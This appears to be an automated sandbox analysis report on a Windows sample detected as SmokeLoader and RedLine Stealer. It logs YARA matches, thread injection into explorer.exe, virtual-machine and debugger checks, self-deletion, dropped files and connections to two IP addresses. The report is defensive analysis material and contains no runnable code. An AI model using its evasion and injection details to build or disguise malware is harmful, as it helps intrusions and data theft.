Source: 00000006.00000002.1370451305.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000B.00000002.1591172725.0000000000681000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000B.00000002.1590986972.00000000004F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000006.00000002.1370487735.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000B.00000002.1591052783.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\PSyWSlhDa5.exe	Code function: 6_2_00403054 RtlCreateUserThread,NtTerminateProcess,	6_2_00403054
Source: C:\Users\user\Desktop\PSyWSlhDa5.exe	Code function: 6_2_00401583 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_00401583
Source: C:\Users\user\Desktop\PSyWSlhDa5.exe	Code function: 6_2_00402721 NtEnumerateKey,NtClose,	6_2_00402721
Source: C:\Users\user\Desktop\PSyWSlhDa5.exe	Code function: 6_2_0040158E NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_0040158E
Source: C:\Users\user\Desktop\PSyWSlhDa5.exe	Code function: 6_2_004015BC NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_004015BC
Source: C:\Users\user\AppData\Roaming\jhfrihr	Code function: 11_2_00403054 RtlCreateUserThread,NtTerminateProcess,	11_2_00403054
Source: C:\Users\user\AppData\Roaming\jhfrihr	Code function: 11_2_00401583 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	11_2_00401583
Source: C:\Users\user\AppData\Roaming\jhfrihr	Code function: 11_2_00402721 NtEnumerateKey,NtClose,	11_2_00402721
Source: C:\Users\user\AppData\Roaming\jhfrihr	Code function: 11_2_0040158E NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	11_2_0040158E
Source: C:\Users\user\AppData\Roaming\jhfrihr	Code function: 11_2_004015BC NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	11_2_004015BC

Source: C:\Users\user\Desktop\PSyWSlhDa5.exe	Code function: 6_2_00401A28		6_2_00401A28
Source: C:\Users\user\AppData\Roaming\jhfrihr	Code function: 11_2_00401A28		11_2_00401A28

Source: PSyWSlhDa5.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000006.00000002.1370701625.0000000000761000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000006.00000002.1370528428.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000B.00000002.1590943156.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000006.00000002.1370451305.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000B.00000002.1591172725.0000000000681000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000B.00000002.1590986972.00000000004F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000006.00000002.1370487735.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000B.00000002.1591052783.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12

Source: PSyWSlhDa5.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: jhfrihr.9.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@2/2@81/2

Source: C:\Users\user\Desktop\PSyWSlhDa5.exe

Code function: 6_2_00601BA4 CreateToolhelp32Snapshot,Module32First,

6_2_00601BA4

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\jhfrihr

Jump to behavior

Source: PSyWSlhDa5.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\PSyWSlhDa5.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: PSyWSlhDa5.exe

ReversingLabs: Detection: 40%

Source: unknown	Process created: C:\Users\user\Desktop\PSyWSlhDa5.exe "C:\Users\user\Desktop\PSyWSlhDa5.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\jhfrihr C:\Users\user\AppData\Roaming\jhfrihr

Source: C:\Users\user\Desktop\PSyWSlhDa5.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PSyWSlhDa5.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PSyWSlhDa5.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PSyWSlhDa5.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhfrihr	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhfrihr	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhfrihr	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhfrihr	Section loaded: msvcr100.dll	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\PSyWSlhDa5.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\PSyWSlhDa5.exe	Unpacked PE file: 6.2.PSyWSlhDa5.exe.400000.0.unpack .text:ER;.data:W;.koroc:R;.jok:R;.bit:R;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\jhfrihr	Unpacked PE file: 11.2.jhfrihr.400000.0.unpack .text:ER;.data:W;.koroc:R;.jok:R;.bit:R;.rsrc:R;.reloc:R; vs .text:EW;

Source: PSyWSlhDa5.exe	Static PE information: section name: .koroc
Source: PSyWSlhDa5.exe	Static PE information: section name: .jok
Source: PSyWSlhDa5.exe	Static PE information: section name: .bit
Source: jhfrihr.9.dr	Static PE information: section name: .koroc
Source: jhfrihr.9.dr	Static PE information: section name: .jok
Source: jhfrihr.9.dr	Static PE information: section name: .bit

Source: C:\Users\user\Desktop\PSyWSlhDa5.exe	Code function: 6_2_0040294B push ebx; ret	6_2_00402957
Source: C:\Users\user\Desktop\PSyWSlhDa5.exe	Code function: 6_2_00402923 push ebx; ret	6_2_00402926
Source: C:\Users\user\Desktop\PSyWSlhDa5.exe	Code function: 6_2_00402930 push ebx; ret	6_2_00402942
Source: C:\Users\user\Desktop\PSyWSlhDa5.exe	Code function: 6_2_0060912A push edi; iretd	6_2_00609145
Source: C:\Users\user\Desktop\PSyWSlhDa5.exe	Code function: 6_2_006032E0 push es; ret	6_2_006032E1
Source: C:\Users\user\Desktop\PSyWSlhDa5.exe	Code function: 6_2_006093FE push edx; iretd	6_2_006094FF
Source: C:\Users\user\Desktop\PSyWSlhDa5.exe	Code function: 6_2_006094D2 push edx; iretd	6_2_006094FF
Source: C:\Users\user\Desktop\PSyWSlhDa5.exe	Code function: 6_2_006229B2 push ebx; ret	6_2_006229BE
Source: C:\Users\user\Desktop\PSyWSlhDa5.exe	Code function: 6_2_0062298A push ebx; ret	6_2_0062298D
Source: C:\Users\user\Desktop\PSyWSlhDa5.exe	Code function: 6_2_00622997 push ebx; ret	6_2_006229A9
Source: C:\Users\user\AppData\Roaming\jhfrihr	Code function: 11_2_0040294B push ebx; ret	11_2_00402957
Source: C:\Users\user\AppData\Roaming\jhfrihr	Code function: 11_2_00402923 push ebx; ret	11_2_00402926
Source: C:\Users\user\AppData\Roaming\jhfrihr	Code function: 11_2_00402930 push ebx; ret	11_2_00402942
Source: C:\Users\user\AppData\Roaming\jhfrihr	Code function: 11_2_004E298A push ebx; ret	11_2_004E298D
Source: C:\Users\user\AppData\Roaming\jhfrihr	Code function: 11_2_004E2997 push ebx; ret	11_2_004E29A9
Source: C:\Users\user\AppData\Roaming\jhfrihr	Code function: 11_2_004E29B2 push ebx; ret	11_2_004E29BE
Source: C:\Users\user\AppData\Roaming\jhfrihr	Code function: 11_2_005F912A push edi; iretd	11_2_005F9145
Source: C:\Users\user\AppData\Roaming\jhfrihr	Code function: 11_2_005F94D2 push edx; iretd	11_2_005F94FF
Source: C:\Users\user\AppData\Roaming\jhfrihr	Code function: 11_2_005F93FE push edx; iretd	11_2_005F94FF
Source: C:\Users\user\AppData\Roaming\jhfrihr	Code function: 11_2_005F32E0 push es; ret	11_2_005F32E1

Source: PSyWSlhDa5.exe	Static PE information: section name: .text entropy: 7.014802365198634
Source: jhfrihr.9.dr	Static PE information: section name: .text entropy: 7.014802365198634

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\jhfrihr

Jump to dropped file

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\jhfrihr

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\psywslhda5.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\jhfrihr:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\PSyWSlhDa5.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\PSyWSlhDa5.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\PSyWSlhDa5.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\PSyWSlhDa5.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\PSyWSlhDa5.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\PSyWSlhDa5.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhfrihr	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhfrihr	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhfrihr	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhfrihr	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhfrihr	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhfrihr	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\PSyWSlhDa5.exe	API/Special instruction interceptor: Address: 7FFB2CECE814
Source: C:\Users\user\Desktop\PSyWSlhDa5.exe	API/Special instruction interceptor: Address: 7FFB2CECD584
Source: C:\Users\user\AppData\Roaming\jhfrihr	API/Special instruction interceptor: Address: 7FFB2CECE814
Source: C:\Users\user\AppData\Roaming\jhfrihr	API/Special instruction interceptor: Address: 7FFB2CECD584

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: jhfrihr, 0000000B.00000002.1591203708.00000000006AE000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ASWHOOK

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 415	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1258	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 741	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 360	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 357	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 3447	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 888	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 867	Jump to behavior

Source: C:\Windows\explorer.exe TID: 7200	Thread sleep count: 415 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7208	Thread sleep count: 1258 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7208	Thread sleep time: -125800s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7204	Thread sleep count: 741 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7204	Thread sleep time: -74100s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7396	Thread sleep count: 246 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7400	Thread sleep count: 360 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7400	Thread sleep time: -36000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7404	Thread sleep count: 357 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7404	Thread sleep time: -35700s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7208	Thread sleep count: 3447 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7208	Thread sleep time: -344700s >= -30000s	Jump to behavior

Source: explorer.exe, 00000009.00000000.1344039231.0000000000C74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000I
Source: explorer.exe, 00000009.00000000.1344650353.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: explorer.exe, 00000009.00000000.1347657847.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000009.00000000.1347657847.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000009.00000000.1344650353.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9dVMware20,1
Source: explorer.exe, 00000009.00000000.1344650353.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
Source: explorer.exe, 00000009.00000000.1347657847.0000000009013000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000009.00000000.1344650353.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000009.00000000.1345524698.0000000007306000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_xU1
Source: explorer.exe, 00000009.00000000.1347657847.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: explorer.exe, 00000009.00000000.1347657847.0000000009052000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000}io
Source: explorer.exe, 00000009.00000000.1347657847.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000I}~"
Source: explorer.exe, 00000009.00000000.1347657847.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000009.00000000.1347657847.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWystem32\DriverStore\en-US\machine.inf_loc5
Source: explorer.exe, 00000009.00000000.1344650353.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware20,1
Source: explorer.exe, 00000009.00000000.1344650353.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
Source: explorer.exe, 00000009.00000000.1347657847.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMWare
Source: explorer.exe, 00000009.00000000.1347657847.0000000009052000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000'
Source: explorer.exe, 00000009.00000000.1345524698.0000000007306000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 00000009.00000000.1347657847.0000000008F27000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWT`
Source: explorer.exe, 00000009.00000000.1344650353.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SVGA IIES1371
Source: explorer.exe, 00000009.00000000.1344650353.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware Virtual RAM
Source: explorer.exe, 00000009.00000000.1344650353.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: explorer.exe, 00000009.00000000.1344039231.0000000000C74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000009.00000000.1347657847.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000009.00000000.1344039231.0000000000C74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\PSyWSlhDa5.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\PSyWSlhDa5.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\PSyWSlhDa5.exe	System information queried: CodeIntegrityInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhfrihr	System information queried: CodeIntegrityInformation			Jump to behavior

Source: C:\Users\user\Desktop\PSyWSlhDa5.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhfrihr	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\PSyWSlhDa5.exe	Code function: 6_2_00601481 push dword ptr fs:[00000030h]	6_2_00601481
Source: C:\Users\user\Desktop\PSyWSlhDa5.exe	Code function: 6_2_0062092B mov eax, dword ptr fs:[00000030h]	6_2_0062092B
Source: C:\Users\user\Desktop\PSyWSlhDa5.exe	Code function: 6_2_00620D90 mov eax, dword ptr fs:[00000030h]	6_2_00620D90
Source: C:\Users\user\AppData\Roaming\jhfrihr	Code function: 11_2_004E092B mov eax, dword ptr fs:[00000030h]	11_2_004E092B
Source: C:\Users\user\AppData\Roaming\jhfrihr	Code function: 11_2_004E0D90 mov eax, dword ptr fs:[00000030h]	11_2_004E0D90
Source: C:\Users\user\AppData\Roaming\jhfrihr	Code function: 11_2_005F1481 push dword ptr fs:[00000030h]	11_2_005F1481

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: jhfrihr.9.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 58.151.148.90 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 197.164.156.210 80			Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\PSyWSlhDa5.exe	Thread created: C:\Windows\explorer.exe EIP: 85B19D0			Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhfrihr	Thread created: unknown EIP: 86F19D0			Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\PSyWSlhDa5.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\PSyWSlhDa5.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhfrihr	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhfrihr	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Source: explorer.exe, 00000009.00000000.1347657847.0000000009013000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1344348529.0000000001440000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.1345417251.0000000004880000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000009.00000000.1344348529.0000000001440000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000009.00000000.1344348529.0000000001440000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: ?Program Manager
Source: explorer.exe, 00000009.00000000.1344039231.0000000000C59000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman
Source: explorer.exe, 00000009.00000000.1344348529.0000000001440000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Stealing of Sensitive Information

Yara detected SmokeLoader

Source: Yara match	File source: 00000006.00000002.1370701625.0000000000761000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1370528428.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1591172725.0000000000681000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1590986972.00000000004F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected SmokeLoader

Source: Yara match	File source: 00000006.00000002.1370701625.0000000000761000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1370528428.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1591172725.0000000000681000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1590986972.00000000004F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	32 Process Injection	11 Masquerading	OS Credential Dumping	511 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
